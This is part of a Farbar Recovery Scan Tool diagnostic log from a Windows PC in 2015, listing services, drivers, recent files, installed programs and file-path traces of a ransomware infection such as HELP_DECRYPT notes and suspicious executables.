S4 SQLAgent$SQLEXPRESS; C:\Program Files (x86)\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [369688 2008-07-10] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5426448 2014-12-15] (TeamViewer GmbH)
R4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 CltMngSvc; C:\PROGRA~2\SearchProtect\Main\bin\CltMngSvc.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 HssDRV6; C:\Windows\System32\DRIVERS\hssdrv6.sys [44744 2014-05-16] (AnchorFree Inc.)
R3 HTTP; C:\Windows\System32\drivers\HTTP.sys [754688 2015-02-24] (Microsoft Corporation) [File not signed]
S3 i8042prt; C:\Windows\system32\drivers\i8042prt.sys [105472 2009-07-13] (Microsoft Corporation) [File not signed]
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-26] (Visicom Media Inc.)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc.)
R3 NVR0Dev; C:\Windows\nvoclk64.sys [40480 2008-05-30] (NVidia Corp.)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [39592 2014-09-04] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2014-12-09] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [129600 2014-12-10] (Razer, Inc.)
R0 SI3132; C:\Windows\System32\drivers\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\drivers\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\drivers\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
R3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-05-16] (Anchorfree Inc.)
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-11 20:08 - 2015-07-11 20:16 - 00027977 _____ C:\Users\User\Desktop\FRST.txt
2015-07-11 20:07 - 2015-07-11 20:08 - 00000000 ____D C:\FRST
2015-07-11 20:07 - 2015-07-11 20:05 - 02130944 _____ (Farbar) C:\Users\User\Desktop\FRST64.exe
2015-07-11 20:04 - 2015-07-11 20:05 - 02130944 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2015-07-11 19:51 - 2015-07-11 19:51 - 00006730 _____ C:\Windows\system32\PerfStringBackup.TMP

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-11 20:17 - 2015-05-30 10:48 - 00003590 _____ C:\Windows\System32\Tasks\ntoskrnl
2015-07-11 20:10 - 2015-05-25 18:05 - 00000000 ____D C:\Users\User\Desktop\Pitch Perfect (2012) [1080p]
2015-07-11 20:10 - 2015-01-23 19:02 - 00000000 ____D C:\Users\User\Desktop\V
2015-07-11 20:10 - 2014-07-17 18:44 - 00000000 ____D C:\Users\User\Desktop\Server files
2015-07-11 20:10 - 2013-12-09 23:41 - 00019344 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-11 20:10 - 2013-12-09 23:41 - 00019344 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-11 19:58 - 2011-02-20 10:35 - 00000000 ____D C:\Users\User\AppData\Local\Adobe
2015-07-11 19:54 - 2014-08-24 18:44 - 00000000 ____D C:\Users\User\AppData\Roaming\Skype
2015-07-11 19:53 - 2013-09-15 00:18 - 00000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2015-07-11 19:53 - 2013-09-05 17:36 - 00000000 ____D C:\Users\User\AppData\Roaming\.minecraft
2015-07-11 19:51 - 2015-03-25 22:28 - 00000000 ____D C:\Users\User\Desktop\Cracker
2015-07-11 19:51 - 2014-01-18 20:15 - 00000000 ___RD C:\Users\User\Desktop\Bukkit Server
2015-07-11 19:48 - 2015-06-03 13:04 - 00000352 ____H C:\ProgramData\@system3.att
2015-07-11 19:48 - 2015-06-03 13:03 - 00000616 ____H C:\ProgramData\@system.temp
2015-07-11 19:44 - 2011-05-19 00:05 - 00000890 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-11 19:44 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-11 19:44 - 2009-07-14 00:51 - 31883105 _____ C:\Windows\setupact.log
2015-07-10 12:47 - 2009-07-14 01:13 - 00877714 _____ C:\Windows\system32\PerfStringBackup.INI
2015-07-10 12:36 - 2014-03-15 22:31 - 00000904 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2017399490-4096563441-3607321274-1000UA.job
2015-07-10 12:33 - 2013-09-02 13:07 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-10 12:27 - 2011-05-19 00:05 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-10 03:15 - 2015-04-14 15:39 - 00000000 ____D C:\Users\User\Desktop\The.Wedding.Ringer.2015.1080p.BluRay.x264.anoXmous
2015-07-10 03:00 - 2013-12-09 23:43 - 01446340 _____ C:\Windows\WindowsUpdate.log
2015-07-10 02:52 - 2014-11-25 19:36 - 00000000 ____D C:\Users\User\Desktop\DF1.0
2015-07-10 02:52 - 2014-06-04 17:03 - 00000000 ____D C:\Users\User\Desktop\df
2015-07-10 02:51 - 2015-02-28 13:58 - 00000000 ____D C:\Users\User\Desktop\2015 iPhone
2015-07-10 02:37 - 2013-09-02 13:07 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-10 02:36 - 2013-09-02 13:07 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-10 02:36 - 2013-09-02 13:07 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

==================== Files in the root of some directories =======

2015-06-03 13:05 - 2015-06-03 13:05 - 0252928 _____ () C:\Users\User\AppData\Roaming\7af1e26.exe
2014-01-31 17:03 - 2014-02-01 01:54 - 0000132 _____ () C:\Users\User\AppData\Roaming\Adobe PNG Format CC Prefs
2014-02-09 03:33 - 2014-02-09 03:33 - 0000052 _____ () C:\Users\User\AppData\Roaming\Camdata.ini
2014-02-09 03:33 - 2014-02-09 03:33 - 0000408 _____ () C:\Users\User\AppData\Roaming\CamLayout.ini
2014-02-09 03:33 - 2014-02-09 03:33 - 0000408 _____ () C:\Users\User\AppData\Roaming\CamShapes.ini
2014-02-09 03:28 - 2014-02-09 03:33 - 0004534 _____ () C:\Users\User\AppData\Roaming\CamStudio.cfg
2015-06-03 17:17 - 2015-06-03 17:17 - 0008690 _____ () C:\Users\User\AppData\Roaming\HELP_DECRYPT.HTML
2015-06-03 17:17 - 2015-06-03 17:17 - 0045682 _____ () C:\Users\User\AppData\Roaming\HELP_DECRYPT.PNG
2015-06-03 17:17 - 2015-06-03 17:17 - 0004288 _____ () C:\Users\User\AppData\Roaming\HELP_DECRYPT.TXT
2015-06-03 17:17 - 2015-06-03 17:17 - 0000304 _____ () C:\Users\User\AppData\Roaming\HELP_DECRYPT.URL
2014-11-13 20:45 - 2014-11-13 20:45 - 0000036 _____ () C:\Users\User\AppData\Roaming\mbam.context.scan
2013-12-12 16:38 - 2013-12-12 16:38 - 0000089 _____ () C:\Users\User\AppData\Roaming\omnicoin.conf
2013-12-12 16:39 - 2014-03-11 16:20 - 0029184 ___SH () C:\Users\User\AppData\Roaming\Thumbs.db
2011-05-19 01:32 - 2011-05-19 01:32 - 0024226 _____ () C:\Users\User\AppData\Roaming\UserTile.png
2014-02-09 03:24 - 2014-02-09 03:24 - 0000096 _____ () C:\Users\User\AppData\Roaming\version2.xml
2014-06-24 23:41 - 2014-11-17 01:41 - 0000129 _____ () C:\Users\User\AppData\Roaming\WB.CFG
2015-06-03 13:03 - 2015-06-03 13:03 - 0000480 ____H () C:\Users\User\AppData\Roaming\麽鎒駓覜
2014-04-28 23:19 - 2014-04-28 23:19 - 0003584 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-06-03 14:19 - 2015-06-03 14:19 - 0008690 _____ () C:\Users\User\AppData\Local\HELP_DECRYPT.HTML
2015-06-03 14:19 - 2015-06-03 14:19 - 0045682 _____ () C:\Users\User\AppData\Local\HELP_DECRYPT.PNG
2015-06-03 14:19 - 2015-06-03 14:19 - 0004288 _____ () C:\Users\User\AppData\Local\HELP_DECRYPT.TXT
2015-06-03 14:19 - 2015-06-03 14:19 - 0000304 _____ () C:\Users\User\AppData\Local\HELP_DECRYPT.URL
2013-12-19 16:53 - 2013-12-19 16:53 - 0007597 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg
2015-06-03 13:03 - 2015-07-11 19:48 - 0000616 ____H () C:\ProgramData\@system.temp
2015-06-03 13:04 - 2015-07-11 19:48 - 0000352 ____H () C:\ProgramData\@system3.att
2015-06-03 13:37 - 2015-06-03 13:37 - 0008690 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-06-03 13:37 - 2015-06-03 13:37 - 0045682 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-06-03 13:37 - 2015-06-03 13:37 - 0004288 _____ () C:\ProgramData\HELP_DECRYPT.TXT
2015-06-03 13:37 - 2015-06-03 13:37 - 0000304 _____ () C:\ProgramData\HELP_DECRYPT.URL
2010-11-20 23:24 - 2010-11-20 23:24 - 0072192 ___SH () C:\ProgramData\mscovrb.exe
2013-12-24 15:16 - 2013-12-24 15:16 - 0004967 _____ () C:\ProgramData\uxxadbmu.rlu

Files to move or delete:
====================
C:\Users\User\AppData\Roaming\Microsoft\Windows\IEUpdate\ntoskrnl.exe
C:\ProgramData\mscovrb.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-05-22 20:07

==================== End of log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version:11-07-2015
Ran by User at 2015-07-11 20:20:53
Running from C:\Users\User\Desktop
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2017399490-4096563441-3607321274-500 - Administrator - Disabled)
Guest (S-1-5-21-2017399490-4096563441-3607321274-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2017399490-4096563441-3607321274-1010 - Limited - Enabled)
User (S-1-5-21-2017399490-4096563441-3607321274-1000 - Administrator - Enabled) => C:\Users\User

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\uTorrent) (Version: 3.4.3.40298 - BitTorrent Inc.)
Adobe After Effects CC (HKLM-x32\...\{317243C1-6580-4F43-AED7-37D4438C3DD5}) (Version: 12.2.1 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.5.1.369 - Adobe Systems Incorporated)
Adobe Flash Player 17 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 17.0.0.191 - Adobe Systems Incorporated)
Adobe Photoshop CC (HKLM-x32\...\{2D99B50E-431D-4AA8-85C1-172A6F8BCF09}) (Version: 14.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC (HKLM-x32\...\{505FF1AC-E7F5-4462-BBA7-08900E7E9EEF}) (Version: 7.2.2 - Adobe Systems Incorporated)
Adobe Reader X (10.1.4) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.4 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.2.152 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{3C378793-5288-0165-FCA4-D319D5E4A490}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{447CDCE5-F555-429B-BFA6-642C3C6D684F}) (Version: 3.1.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DF7096B-715A-4233-8633-C7A16ED6D616}) (Version: 3.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C4123106-B685-48E6-B9BD-E4F911841EB4}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft ShowBiz (HKLM-x32\...\InstallShield_{9D41D2EF-2D33-4CFD-8A3E-C7E6FCC3303B}) (Version: 5.0.1.480 - ArcSoft)
ArcSoft ShowBiz (x32 Version:  - ArcSoft) Hidden
Auslogics Registry Cleaner (HKLM-x32\...\{8D8024F1-2945-49A5-9B78-5AB7B11D7942}_is1) (Version: 4.1.0.0 - Auslogics Labs Pty Ltd)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.1.7 - EA Digital Illusions CE AB)
BlueStacks Packages (HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\BlueStacks Packages) (Version:  - ) <==== ATTENTION
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Camtasia Studio 8 (HKLM-x32\...\{A7727F03-5311-4A12-9A63-2ACD20BA0497}) (Version: 8.2.1.1423 - TechSmith Corporation)
CINEMA 4D Demo 15.057 (HKLM\...\MAXONE03ECA7E) (Version: 15.057 - MAXON Computer GmbH) <==== ATTENTION
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.02 - Creative Technology Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FileZilla Client 3.7.3 (HKLM-x32\...\FileZilla Client) (Version: 3.7.3 - Tim Kosse)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 31.0.1650.63 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{F8B67DF7-B543-3DE0-BCEF-F844F891FD48}) (Version: 5.1.7.17873 - Google)
Google Update Helper (x32 Version: 1.3.22.3 - Google Inc.) Hidden
Gyazo 1.2.1 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc. & Toshiyuki Masui)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Hotspot Shield 3.42 (HKLM-x32\...\HotspotShield) (Version: 3.42 - AnchorFree Inc.)
iOSinstaller (HKLM-x32\...\iOSinstaller) (Version:  - iosinstaller.com)
iTunes (HKLM\...\{D227565A-0033-40AD-89BA-653A205CDC11}) (Version: 12.1.1.4 - Apple Inc.)
Java 7 Update 71 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417071FF}) (Version: 7.0.710 - Oracle)
join.me (HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\JoinMe) (Version: 1.18.0.131 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
ManyCam 4.0.77 (HKLM-x32\...\ManyCam) (Version: 4.0.77 - Visicom Media Inc.)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Help Viewer 1.0 (HKLM\...\Microsoft Help Viewer 1.0) (Version: 1.0.30319 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUSR) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (HKLM-x32\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{C688457E-03FD-4941-923B-A27F4D42A7DD}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{4E968D9C-21A7-4915-B698-F7AEB913541D}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (English) (HKLM-x32\...\{9D6D76A6-4328-49E8-97A7-531A74841DA5}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP1 Design Tools English (HKLM-x32\...\{0C19D563-5F25-4621-BF10-01F741BD283F}) (Version: 3.5.5692.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{2A2F3AE8-246A-4252-BB26-1BEB45627074}) (Version: 10.50.1447.4 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{0826F9E4-787E-481D-83E0-BC6A57B056D5}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.30319 (HKLM\...\{94D70749-4281-39AC-AD90-B56A0E0A402E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Express Prerequisites x64 - ENU (HKLM\...\{BCA26999-EC22-3007-BB79-638913079C9A}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Windows SDK for Visual Studio 2008 SP1 Express Tools for .NET Framework - enu (HKLM\...\{DFB3AD2B-4EE2-3077-BF1D-3CA164BC5336}) (Version: 3.5.30729 - Microsoft Corporation)
Microsoft Windows SDK for Visual Studio 2008 SP1 Express Tools for Win32 (HKLM\...\{F5C819A5-E068-4f7d-B91A-1BD18702AFFB}) (Version: 6.1.5295.17011 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movavi Video Editor (HKLM-x32\...\Movavi Video Editor 9) (Version: 9.5.1 - Movavi)
Mozilla Firefox 35.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0.1 (x86 en-US)) (Version: 35.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 35.0.1 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM-x32\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.8 (HKLM-x32\...\{A9DBD31A-A09F-4C7E-86D1-3B21C59000D1}) (Version: 1.2.8 - Thorvald Natvig)
Nero 7 Essentials (HKLM-x32\...\{DB0BA61A-8295-4211-85F7-184FC2591033}) (Version: 7.03.1189 - Nero AG)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.3 - Notepad++ Team)
NVIDIA Performance (HKLM-x32\...\InstallShield_{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA System Monitor (HKLM-x32\...\InstallShield_{5887D64D-2663-43FB-B4BD-7464C56AB425}) (Version: 1.00.0000 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.3.2.2730 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
ProxyGate version 2.1.0.1120 (HKU\S-1-5-21-2017399490-4096563441-3607321274-1000\...\{F7AE15D1-9F31-4DBB-88F6-3853CEF6B998}_is1) (Version: 2.1.0.1120 - Gold Click Ltd)
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.18.23036 - Razer Inc.)
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
Segoe UI (x32 Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{91150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUSR_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version:  - Microsoft) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Share YouTube Videos version 1 (HKLM-x32\...\{55DAC5D1-B178-42B2-86A3-94A3E0B4F3DD}_is1) (Version: 1 - )
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.1 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
Sonic & All-Stars Racing Transformed (HKLM-x32\...\Steam App 212480) (Version:  - Sumo Digital)
Speccy (HKLM\...\Speccy) (Version: 1.22 - Piriform)
Sql Server Customer Experience Improvement Program (x32 Version: 10.0.1600.22 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Strongvault Online Backup (HKLM-x32\...\{4DC876FD-105A-431A-87B2-C1BE7C1CDD51}) (Version: 2.5.0.5 - Strongvault Online Storage LLC) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab Detection (HKLM-x32\...\{A407FC22-36BF-4C82-A516-59D94BC505A9}) (Version: 1.0.5.0 - Husdawg, LLC)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36897 - TeamViewer)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
Toontown Rewritten (HKLM-x32\...\Toontown Rewritten) (Version: 00.00.00.00 - The TTR Team)
Unity Web Player (HKLM-x32\...\UnityWebPlayer) (Version: 2.5.5b4_50 - Unity Technologies ApS)
Update for Skype for Business 2015 (KB2889853) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUSR_{40930C8E-A677-414C-A72F-DFDEB10738FB}) (Version:  - Microsoft)
WIDCOMM Bluetooth Software 6.0.1.4300 (HKLM\...\{03D1988F-469F-4843-8E6E-E5FE9D17889D}) (Version: 6.0.1.4300 - Dell)
Windows Driver Package - Logitech HIDClass  (10/30/2006 1.0) (HKLM\...\1C48352AD9D5F5F133C632DD9CCEE4BDC193D78F) (Version: 10/30/2006 1.0 - Logitech)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2017399490-4096563441-3607321274-1000_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> No File path
